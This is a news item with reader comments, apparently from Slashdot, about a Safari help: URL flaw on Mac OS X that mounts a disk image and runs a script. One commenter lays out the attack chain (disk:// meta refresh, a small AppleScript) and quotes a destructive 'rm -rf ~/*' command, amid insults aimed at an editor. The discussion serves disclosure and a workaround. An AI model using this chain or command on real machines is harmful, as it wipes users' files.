Safari Falls Victim to Remote Code Exploit
A user writes, "A new vulnerability has been found in Mac OS X's Safari, which will launch Help.app and run an arbitrary script with a URL like 'help:runscript=...', assuming a known path (which is possible when Safari is set to automount disk images (which is the default)). A nice working demonstration is available on insecure.ws while the incident has been reported on Full-Disclosure."
Jesus, pudge, you reject my story where it is mentioned that YOU DON'T NEED AUTO OPENING OF "SAFE FILES" TURNED ON FOR THIS TO WORK and then post some lame arse submission that gets it wrong.
.help extension to the chess app) and a link where to get software to do this (because you can't do it from the GUI in OSX as you could in OS9).
Fact 1. Using the disk:// URL type, and sticking it in a Meta refresh tag, you can remotely mount a disk image without the user even knowing. It DOES NOT need auto open of safe files to be turned on.
Fact 2. If the disk image is small, which it would be if there's only an Applescript on it with 'do shellscript="rm -rf~/*" ', then getting the user to click on a link that runs the script a few seconds later is easy and you could even do it via javascript and automate the whole thing.
Fact 3. Pudge your sarcastic "from the let's publish it so everyone knows who to do it" is a blatant stupidity. Jesus fuck. This vulnerability was on Heise.de on Saturday. It may be news to you, pudge, but one hell of a lot of people read and visit heise's site. Not everyone is an English only American.
Fact 4. And this makes me especially mad at you, you clown, for using this submission instead of mine, is that I submitted a workaround (point the
Grow up pudge and use your brains instead of your zealotry.
This hint was taken directly from the article...
Blatant karma whore!
1. YOUR submission was incorrect! This vulnerability works in ALL browsers!
2. The workaround IS a goddamn workaround and IT DOES work, and IT DOESN't disable help! Jesus almighty, try it out, it merely disable running help from the browser, not running help from an application.
3. Apple was warned TWO MONTHS ago about this vulnerability! It was openly published on Heise on Saturday. It was all over Mac forums in Germany and the US over the weekend.
4. Since it was openly known (and with no response from Apple for two months), you nice bright guy, I decided to submit a COMPLETE story with a working workaround (it really does work pudge) in order to help Mac users protect themselves, not because of wanting to be in anyone's highlights.
I am going to mail Taco about this pudge. You are guilty, IMO, of neglecting a very serious security vulnerability on OSX, and then neglecting to actually check the facts and then finally post a story that does only helps the knowledge of the exploit spread but with no help to users, and that soley because YOU do not agree with a FACT (it was already known). Disgusting.